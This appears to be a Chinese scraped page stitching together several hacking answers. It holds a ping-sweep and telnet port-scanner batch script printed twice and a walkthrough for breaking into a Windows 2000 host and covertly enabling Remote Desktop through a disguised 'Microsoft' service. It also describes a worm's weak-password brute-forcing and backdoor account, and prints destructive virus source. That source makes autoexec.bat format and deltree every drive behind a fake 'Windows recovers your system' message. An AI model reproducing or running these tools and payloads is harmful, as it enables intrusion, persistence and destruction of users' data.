如何扫描开放端口_bat开放端口扫描

hacker|
247

怎样获取局域网所有电脑的IP地址?

你要先知道你在哪个网段,可以用ipconfig命令查看,比如你的IP是192.168.0.1,你的段就在192.168.0这个段,在下面的批处理中输入起始ip和终止ip你就可以这样输:

起始:192.168.0.1

结束:192.168.0.255

扫描完后,就可以看见在线的所有IP!

以下是我的一个批处理: (IP探测+端口扫描)

前段的功能就可以达到你的要求,扫描IP!

把下面的代码保存在文本文件(txt)里,再把后缀名改为bat,即可运行!

@echo off

title 扫描在线IP

MODE con: COLS=60 LINES=18

color 0a

:start

cls

for /l %%i in (1,1,4) do echo.

if exist 在线IP.txt goto zcx

echo ╔—…—…—…—…—…—…—…—…—…—…—……╗

echo ┆ ===IP扫描☆端口探测=== ┆

echo ┆ ┆

echo ┆ 先输入起始IP和中止IP,程序就会自动扫 ┆

echo ┆ 描在线的主机并把在线主机IP地址纪录供后面 ┆

echo ┆ 程序调用。 ┆

echo ┆ 注意:此程序暂时不能扫描不同网段的IP地址。 ┆

echo ╚—…—…—…—…—…—…—…—…—…—…——…╝

for /l %%i in (1,1,2) do echo.

set/p var1= 起始IP:

set/p var2= 终止IP:

cls

echo.

for /f "tokens=1,2,3,4 delims=." %%a in ("%var1%") do (

set var4=%%a.%%b.%%c

set var5=%%d)

for /f "tokens=1,2,3,4 delims=." %%a in ("%var2%") do (

set var6=%%a.%%b.%%c

set var7=%%d)

if not %var4%==%var6% echo 错误:不在同一网段! pausenul cls goto start

for /L %%i in (%var5%,1,%var7%) do (

ping -n 1 %var4%.%%i nul echo %var4%.%%i 在线 echo %var4%.%%i在线IP.txt||echo %var4%.%%i)

if exist 在线IP.txt (

find /c 在线IP.txt "." IPL.temp

FOR /F "tokens=3 delims= " %%c in (IPL.temp) do echo 扫描完成,共有%%c台在线主机!

del IPL.temp echo 端口检测 pause nul) ELSE echo 扫描完毕! 此IP段没有在线主机! 按任意键返回! pause nul goto start

:zcx

title 探测在线IP的端口开放情况

color 0a

cls

for /l %%i in (1,1,5) do echo.

echo 恭喜,你输入的IP范围内扫描到有在线

echo 的主机,现在可以探测在线的主机都开了什

echo 么端口,请按提示操作!

echo.

echo 1、探测指定单一端口

echo 2、探测指定多个端口

echo 3、探测指定端口范围

echo 4、重新扫描另外IP段

echo 5、退出

echo.

set /p shr= 请选择:

if "%shr%"=="1" goto dy

if "%shr%"=="2" goto dg

if "%shr%"=="3" goto fw

if "%shr%"=="4" del 在线IP.txt goto start

if "%shr%"=="5" exit

IF ERRORLEVEL 1 goto cw

:cw

color 0f

echo 输入错误! 按任意键返回! pause nul cls

goto zcx

:dy

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo.

echo.

echo ===请选择探测模式===

echo.

echo 1、逐一探测 2、一并探测 3、使用说明 4、返回

echo.

set /p shr=选择:

if /i "%shr%"=="1" goto zhuyi

if /i "%shr%"=="2" goto yibing

if /i "%shr%"=="3" goto shuoming

if /i "%shr%"=="4" goto zcx

IF ERRORLEVEL 1 goto cw

:cw

color 0f

echo 输入错误! 按任意键返回! pause nul cls

goto dy

:zhuyi

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo.

echo.

echo ===请输入端口后按回车键===

echo.

set /p shr=端口号:

FOR /F "delims= " %%c in (在线IP.txt) do (

echo IP:%%c Port:%shr%

cmd /c start /wait /min telnet %%c %shr%

)

echo.

echo 探测完成!

echo 按任意键返回 pause nul goto dy

:yibing

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo.

echo.

echo ===请输入端口后按回车键===

echo.

set /p shr=端口号:

FOR /F "delims= " %%c in (在线IP.txt) do (

echo IP:%%c Port:%shr%

start /min telnet %%c %shr%

)

echo.

echo 探测完成!

echo 按任意键返回 pause nul goto dy

:shuoming

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 1、逐一探测方式比较慢,但是不占用太多系统资源!

echo 2、一并探测方式会一起开出很多个CMD窗口,系统资源少

echo 的话不建议选用!

echo 3、如果任务栏显示一个CMD窗口一直没自动关的话,就说

echo 明你指定的端口在这个IP上是开放的,在标题栏上可

echo 看到IP,或看本批处理窗口内停着的最后一行,可以

echo 看到IP和端口号,把停着不自动关的那个窗口关了可

echo 可继续探测!

echo.

echo.

echo 按任意键返回 pause nul goto dy

:dg

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo 端口输完后按OK加回车继续

echo 输入dk加回车重输入端口

echo 输入FH加回车返回

if exist 自定端口.txt echo 已指定端口:

if exist 自定端口.txt type 自定端口.txt

echo.

set /p shr=端口号:

if /i "%shr%"=="ok" goto jx

if /i "%shr%"=="dk" del 自定端口.txt goto dg

if /i "%shr%"=="fh" goto zcx

echo %shr%自定端口.txt

goto dg

:jx

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo.

echo.

echo ===请选择探测模式===

echo.

echo 1、逐一探测 2、一并探测 3、使用说明 4、返回

echo.

set /p shr=选择:

if /i "%shr%"=="1" goto zhuyi2

if /i "%shr%"=="2" goto yibing2

if /i "%shr%"=="3" goto shuoming2

if /i "%shr%"=="4" goto zcx

IF ERRORLEVEL 1 goto cw

:cw

color 0f

echo 输入错误! 按任意键返回! pause nul cls

goto dy

:zhuyi2

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo.

FOR /F "delims= " %%c in (在线IP.txt) do (

FOR /F "delims= " %%d in (自定端口.txt) do (

echo IP:%%c Port:%%d

cmd /c start /wait /min telnet %%c %%d

)

)

echo.

echo 探测完成!

echo 按任意键返回 pause nul goto dy

:yibing2

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo.

FOR /F "delims= " %%c in (在线IP.txt) do (

FOR /F "delims= " %%d in (自定端口.txt) do (

echo IP:%%c Port:%%d

start /min telnet %%c %%d

)

)

echo.

echo 探测完成!

echo 按任意键返回 pause nul goto dy

:shuoming2

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 1、逐一探测方式比较慢,但是不占用太多系统资源!

echo 2、一并探测方式会一起开出很多个CMD窗口,系统资源少

echo 的话不建议选用!

echo 3、如果任务栏显示一个CMD窗口一直没自动关的话,就说

echo 明你指定的端口在这个IP上是开放的,在标题栏上可

echo 看到IP,或看本批处理窗口内停着的最后一行,可以

echo 看到IP和端口号,把停着不自动关的那个窗口关了可

echo 可继续探测!

echo.

echo.

echo 按任意键返回 pause nul goto jx

:fw

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo 请按照提示输入

echo 输FH加回车返回

set /p fw1= 起始端口:

if /i "%fw1%"=="fh" goto zcx

set /p fw2= 中止端口:

if /i "%fw2%"=="fh" goto zcx

FOR /F "delims= " %%c in (在线IP.txt) do (

for /l %%d in (%fw1%,1,%fw2%) do (

echo IP:%%c Port:%%d

cmd /c start /wait /min telnet %%c %%d

)

)

echo.

echo 探测完成!

echo 按任意键返回 pause nul goto fw

局域网内查IP

以下是我的一个批处理: (IP探测+端口扫描)

前段的功能就可以达到你的要求,扫描IP!

把下面的代码保存在文本文件(txt)里,再把后缀名改为bat,即可运行!

@echo off

title 扫描在线IP

MODE con: COLS=60 LINES=18

color 0a

:start

cls

for /l %%i in (1,1,4) do echo.

if exist 在线IP.txt goto zcx

echo ╔—…—…—…—…—…—…—…—…—…—…—……╗

echo ┆ ===IP扫描☆端口探测=== ┆

echo ┆ ┆

echo ┆ 先输入起始IP和中止IP,程序就会自动扫 ┆

echo ┆ 描在线的主机并把在线主机IP地址纪录供后面 ┆

echo ┆ 程序调用。 ┆

echo ┆ 注意:此程序暂时不能扫描不同网段的IP地址。 ┆

echo ╚—…—…—…—…—…—…—…—…—…—…——…╝

for /l %%i in (1,1,2) do echo.

set/p var1= 起始IP:

set/p var2= 终止IP:

cls

echo.

for /f "tokens=1,2,3,4 delims=." %%a in ("%var1%") do (

set var4=%%a.%%b.%%c

set var5=%%d)

for /f "tokens=1,2,3,4 delims=." %%a in ("%var2%") do (

set var6=%%a.%%b.%%c

set var7=%%d)

if not %var4%==%var6% echo 错误:不在同一网段! pausenul cls goto start

for /L %%i in (%var5%,1,%var7%) do (

ping -n 1 %var4%.%%i nul echo %var4%.%%i 在线 echo %var4%.%%i在线IP.txt||echo %var4%.%%i)

if exist 在线IP.txt (

find /c 在线IP.txt "." IPL.temp

FOR /F "tokens=3 delims= " %%c in (IPL.temp) do echo 扫描完成,共有%%c台在线主机!

del IPL.temp echo 端口检测 pause nul) ELSE echo 扫描完毕! 此IP段没有在线主机! 按任意键返回! pause nul goto start

:zcx

title 探测在线IP的端口开放情况

color 0a

cls

for /l %%i in (1,1,5) do echo.

echo 恭喜,你输入的IP范围内扫描到有在线

echo 的主机,现在可以探测在线的主机都开了什

echo 么端口,请按提示操作!

echo.

echo 1、探测指定单一端口

echo 2、探测指定多个端口

echo 3、探测指定端口范围

echo 4、重新扫描另外IP段

echo 5、退出

echo.

set /p shr= 请选择:

if "%shr%"=="1" goto dy

if "%shr%"=="2" goto dg

if "%shr%"=="3" goto fw

if "%shr%"=="4" del 在线IP.txt goto start

if "%shr%"=="5" exit

IF ERRORLEVEL 1 goto cw

:cw

color 0f

echo 输入错误! 按任意键返回! pause nul cls

goto zcx

:dy

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo.

echo.

echo ===请选择探测模式===

echo.

echo 1、逐一探测 2、一并探测 3、使用说明 4、返回

echo.

set /p shr=选择:

if /i "%shr%"=="1" goto zhuyi

if /i "%shr%"=="2" goto yibing

if /i "%shr%"=="3" goto shuoming

if /i "%shr%"=="4" goto zcx

IF ERRORLEVEL 1 goto cw

:cw

color 0f

echo 输入错误! 按任意键返回! pause nul cls

goto dy

:zhuyi

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo.

echo.

echo ===请输入端口后按回车键===

echo.

set /p shr=端口号:

FOR /F "delims= " %%c in (在线IP.txt) do (

echo IP:%%c Port:%shr%

cmd /c start /wait /min telnet %%c %shr%

)

echo.

echo 探测完成!

echo 按任意键返回 pause nul goto dy

:yibing

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo.

echo.

echo ===请输入端口后按回车键===

echo.

set /p shr=端口号:

FOR /F "delims= " %%c in (在线IP.txt) do (

echo IP:%%c Port:%shr%

start /min telnet %%c %shr%

)

echo.

echo 探测完成!

echo 按任意键返回 pause nul goto dy

:shuoming

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 1、逐一探测方式比较慢,但是不占用太多系统资源!

echo 2、一并探测方式会一起开出很多个CMD窗口,系统资源少

echo 的话不建议选用!

echo 3、如果任务栏显示一个CMD窗口一直没自动关的话,就说

echo 明你指定的端口在这个IP上是开放的,在标题栏上可

echo 看到IP,或看本批处理窗口内停着的最后一行,可以

echo 看到IP和端口号,把停着不自动关的那个窗口关了可

echo 可继续探测!

echo.

echo.

echo 按任意键返回 pause nul goto dy

:dg

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo 端口输完后按OK加回车继续

echo 输入dk加回车重输入端口

echo 输入FH加回车返回

if exist 自定端口.txt echo 已指定端口:

if exist 自定端口.txt type 自定端口.txt

echo.

set /p shr=端口号:

if /i "%shr%"=="ok" goto jx

if /i "%shr%"=="dk" del 自定端口.txt goto dg

if /i "%shr%"=="fh" goto zcx

echo %shr%自定端口.txt

goto dg

:jx

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo.

echo.

echo ===请选择探测模式===

echo.

echo 1、逐一探测 2、一并探测 3、使用说明 4、返回

echo.

set /p shr=选择:

if /i "%shr%"=="1" goto zhuyi2

if /i "%shr%"=="2" goto yibing2

if /i "%shr%"=="3" goto shuoming2

if /i "%shr%"=="4" goto zcx

IF ERRORLEVEL 1 goto cw

:cw

color 0f

echo 输入错误! 按任意键返回! pause nul cls

goto dy

:zhuyi2

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo.

FOR /F "delims= " %%c in (在线IP.txt) do (

FOR /F "delims= " %%d in (自定端口.txt) do (

echo IP:%%c Port:%%d

cmd /c start /wait /min telnet %%c %%d

)

)

echo.

echo 探测完成!

echo 按任意键返回 pause nul goto dy

:yibing2

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo.

FOR /F "delims= " %%c in (在线IP.txt) do (

FOR /F "delims= " %%d in (自定端口.txt) do (

echo IP:%%c Port:%%d

start /min telnet %%c %%d

)

)

echo.

echo 探测完成!

echo 按任意键返回 pause nul goto dy

:shuoming2

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 1、逐一探测方式比较慢,但是不占用太多系统资源!

echo 2、一并探测方式会一起开出很多个CMD窗口,系统资源少

echo 的话不建议选用!

echo 3、如果任务栏显示一个CMD窗口一直没自动关的话,就说

echo 明你指定的端口在这个IP上是开放的,在标题栏上可

echo 看到IP,或看本批处理窗口内停着的最后一行,可以

echo 看到IP和端口号,把停着不自动关的那个窗口关了可

echo 可继续探测!

echo.

echo.

echo 按任意键返回 pause nul goto jx

:fw

color 0a

cls

for /l %%i in (1,1,2) do echo.

echo + +说明+ +

echo.

echo 探测中的时候任务栏显示一个或多个CMD窗口并一直没自动

echo 关闭的话,就说明你指定的端口在这个IP上是开放的,在标题栏

echo 上可看到IP,或看本批处理窗口内停着的最后一行,可以看到IP

echo 和端口号,把停着不自动关的那个窗口关了可以继续探测!

echo.

echo 请按照提示输入

echo 输FH加回车返回

set /p fw1= 起始端口:

if /i "%fw1%"=="fh" goto zcx

set /p fw2= 中止端口:

if /i "%fw2%"=="fh" goto zcx

FOR /F "delims= " %%c in (在线IP.txt) do (

for /l %%d in (%fw1%,1,%fw2%) do (

echo IP:%%c Port:%%d

cmd /c start /wait /min telnet %%c %%d

)

)

echo.

echo 探测完成!

echo 按任意键返回 pause nul goto fw

如何开3389端口啊?

首先我们制作开启3389的工具

先把下面的注册表内容copy一份,另存为3389.reg注册表文件

注册表内容:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]

"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]

"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]

"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]

"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]

"Hotkey"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]

"Start"=dword:00000002

"ErrorControl"=dword:00000001

"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\

74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\

00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00

"ObjectName"="LocalSystem"

"Type"=dword:00000010

"Description"="Microsoft"

"DisplayName"="Microsoft"

再把下面的内容保存为批处理文件3389.bat

安装批处理内容:

copy termsrv.exe eventlog.exe

regedit.exe /s 3389.reg

del 3389.reg

del 3389.exe

del 3389.bat

用winrar制作成exe自解压缩包

61.188.***.*** user:administrato pass:空

先使用工具letmein判断其操作系统

letmein \\ip -all -d

TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了

再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾

应该没有开启了

建立ipc连接

copy工具过去

net use \\ip\ipc$ "pass" /user:name

copy file \\ip\admin$\system32

用opentelnet开对方的telnet

opentelnet \\ip name pass 1 99

用telnet进入

进入到对方的winnt\system32\

目录

解压缩3389.exe

运行安装批处理3389.bat

现在我们把对方重起一下,用reboot

我们用ping命令监视他的上线情况,等他下线,呵呵下了,又上来了,不慌连,3389等会才能好,对方的机器有点慢

看见了么,开启成功!

现在开始.

假设我们拿到了一个主机的管理员帐户和密码.

主机: 192.168.0.1

帐号: administrator

密码: 7788

2000系统安装在c:\winnt下

从上面的的介绍可以知道,2000专业版是不可以远程安装终端服务的,那我们就要首先来

判断此主机是专业版还是服务器版,才能进入下一个环节.

我们可以先用对方所开帐户判断:

c:\letmein \\192.168.0.1 -all -d

stating connecting to server ...

Server local time is: 2002-1-13 10:19:22

Start get all users form server...

--------------------------

Total = 5

--------------------------

num0= Administrator ()

num1= Guest ()

num2= IUSR_servername (Internet 来宾帐号 )

num3= IWAM_servername (启动 IIS 进程帐号)

num4= TsInternetUser (TsInternetUser)

--------------------------

Total = 5

--------------------------

一般情况num2/3/4这三个帐户都是2000server默认开启的.

2000专业版默认是不开这些帐户的.

我们也可以扫描对方开放的端口进一步确认:

用扫描软件如:superscan3.exe扫描对方所开端口

判断对方是否开启25,3372等2000server默认开启的端口.

当然我们还可以使用一些工具,如:cmdinfo.zip

这2个东东可以获得本地或远程NT/2K主机的版本,系统路径,源盘路径,PACK版本,安装时间等一

系列信息,一个图形界面,一个命令行.

通过返回的信息就可以很清楚的了解对方主机情况.

还有一些其他的方法来判断,如:从对方所开的服务来确定等,

从上面的判断准确率还算高,别的就不一一说明了.

如果你在以上步骤里发现对方主机并没有那3个帐户,默认端口也没开,

或cmdinfo返回的信息对方是2000专业版,你就要放弃安装3389的计划了.

现在我们要进入下一环节:

判断终端服务到底有没有安装?

你也许要问:为什么还要判断啊?我扫描没有发现3389端口啊?

这里就需要解释一下,如果装了终端服务组件,可能有哪几种情况扫描不到3389端口?

1.终端服务termservice在"管理工具""服务"中被禁用.

2.终端服务连接所需的RDP协议在"管理工具""终端服务配置"中被停用连接.

3.终端服务默认连接端口3389被人为的改变.如何改变请看修改终端服务默认的3389端口(图文)

4.终端服务绑定的网络适配器不是外网的.

5.防火墙和端口过滤之类的问题.

6.....(还有我没想到的)

其实,我们遇到最多的情况就是以上5种情况.

现在开始判组件是否被安装.

先与远程主机连接,映射远程主机C盘为本地Z盘

net use z: \\192.168.0.1\c$ "7788" /user:"administrator"

命令成功完成。

然后转到Z盘,检查

Z:\Documents and Settings\All Users\「开始」菜单\程序\管理工具

里是否有 "终端服务管理器"和"终端服务配置"的快捷方式文件

如有已安装服务组件的会有,反之,没有(98% 人为故意删的可能性较小)

我们还可以在下一步telnet到对方主机后使用终端服务自带的命令进一步的核实.

判断完毕,对方好像是没有安装终端服务组件,可以进入下一步:

telnet登陆对方主机,准备安装服务组件.

在这里,我强烈建议使用2000自带的telnet服务端登陆,

有回显,不容易出错.个人感觉使用它,一次成功的比例高很多.(呵呵~,个人理解啊!)

就算没有开,打开用完后再关掉就完了.

.abu.写的最快速登录WIN2K TELNET 服务已经把这个方法介绍的非常详细,

而且他的办法(在本机建立同名,同密码帐户),让快速实现telnet登陆成为现实.

假如我们已开启对方23端口,

telnet 192.168.0.1

输入用户名/密码

*===============================================================

欢迎使用 Microsoft Telnet 服务器。

*===============================================================

C:\

\\成功进入!!!!

进入后,再次检查终端组件是否安装:

c:\query user

这个工具需要安装终端服务.

这样就进一步确定了组件没有被安装.如果返回:

USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME

w1 console 0 运行中 . 2002-1-12 22:5

\\类似这样的信息,可能组件就已安装.

好!都清楚了,可以开始安装了.

---------------------------------------------------

C:\dir c:\sysoc.inf /s //检查INF文件的位置

c:\WINNT\inf 的目录

2000-01-10 20:00 3,770 sysoc.inf

1 个文件 3,770 字节

-----------------------------------------------------

C:\ dir c:\sysocmgr.* /s //检查组件安装程序

c:\WINNT\system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe

1 个文件 42,768 字节

-----------------------------------------------------

c:\echo [Components] c:\wawa

c:\echo TSEnable = on c:\wawa

//这是建立无人参与的安装参数

c:\type c:\wawa

[Components]

TSEnable = on

//检查参数文件

------------------------------------------------------

c:\sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q

-----------------------------------------------------

这一条就是真正安装组件的命令.

以上这条命令没有加/R参数,主机在安装完后自动重起.

如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,

3389终端服务就已经开启.你就可以连上去了.

问题和建议:

A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方

的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒.

B 一次不行可以再试一次,在实际中很有作用.

C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼,

而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议.

Bat.Worm.Muma能干吗?

那个是病毒,该病毒采用批处理命令编写,并携带端口扫描工具,通过暴力破解被攻击的计算机超级用户Frethem/index.htm" target="_blank" style='text-decoration: underline;color: #0000FF'密码,进行疯狂传播。病毒由Start.bat开始运行。这个批处理程序会调用其它批处理程序去完成传染;

3、病毒会搜索从C:到H:盘中\MU目录以及其了目录下的所有文件,并把文件名保存在LAN.LOG文件中。当被搜索的文件名中包含“MU”字符串时,nwiz.exe将被执行,nwiz.exe根据nwiz.ini和nwiz.in_文件对病毒中的字符串进行简单的加密。这个搜索过程完成后,LAN.LOG会被删除;

4、删除ipcfind.txt文件,调HFind.exe进行网络扫描,搜索网络中的计算机。并试图使用以下的密码去破解被攻击的计算机。可能的密码是:

password

passwd

admin

pass

123

1234

12345

123456

密码为空

5、被HFind.exe破解成功的计算机,会被病毒将上述的所有文件通过管理员文件共享方式拷贝到其系统目录下。对于Windows

NT、Windows200系统是C:\winnt\system32目录,对于WindowsXP系统是C:\winnt\system32或C:\Windows\system32目录,对于Win9X是C:\windows\system目录;

6、传染成功后,病毒会用Psexec.exe程序远程启动被感染计算机上的Start.bat,从而使病毒在被感染的计算机上激活;

7、调用系统程序netstat.exe,然后运行Near.bat从netstat的输出信息中获得更多的IP,并对这些IP进行攻击;

8、ss.bat创建或者修改系统中的admin用户,并设置其它密码为:KKKKKKK。为被攻击计算机留下一个后门。

9、利用ntservice.bat调用ntservice.exe为自己注册一个名为"Application"的系统服务,保证自己能在每次系统重启时被激活。

最近有变异的

原病毒源代码:@echo off

rem This program is dedecated to a very special person that does not want to be named.

:start

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

call attrib -r -h c:autoexec.bat nul

echo @echo off c:autoexec.bat

echo call format c: /q /u /autoSample nul c:autoexec.bat

call attrib +r +h c:autoexec.bat nul

rem Drive checking and assigning the valid drives to the drive variable.

set drive=

set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z

rem code insertion for Drive Checking takes place here.

rem drivechk.bat is the file name under the root directory.

rem As far as the drive detection and drive variable settings, don't worry about how it

rem works, it's d*amn to complicated for the average or even the expert batch programmer.

rem Except for Tom Lavedas.

echo @echo off drivechk.bat

echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" nul {t}.bat

%comspec% /e:2048 /c {t}.bat drivechk.bat

del {t}.bat

echo if errorlevel 1 goto enddc drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem When errorlevel is 1, then the above is not true, if 0, then it's true.

rem Opposite of binary rules. If 0, it will elaps to the next command.

echo @prompt %%%%comspec%%%% /f /c dir %%%%1:./ad/w/-p $b find "bytes" nul {t}.bat

%comspec% /e:2048 /c {t}.bat drivechk.bat

del {t}.bat

echo if errorlevel 1 goto enddc drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.

rem if errorlevel is 0, then it will elaps to the next command.

echo @prompt dir %%%%1:./ad/w/-p $b find " 0 bytes free" nul {t}.bat

%comspec% /e:2048 /c {t}.bat drivechk.bat

del {t}.bat

echo if errorlevel 1 set drive=%%drive%% %%1 drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.

rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.

echo :enddc drivechk.bat

rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".

rem Now we will use the program drivechk.bat to attain valid drive information.

:Sampledrv

for %%a in (%alldrive%) do call drivechk.bat %%a nul

del drivechk.bat nul

if %drive.==. set drive=c

:form_del

call attrib -r -h c:autoexec.bat nul

echo @echo off c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) call deltree /y %%%%a: nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample nul c:autoexec.bat

echo cls c:autoexec.bat

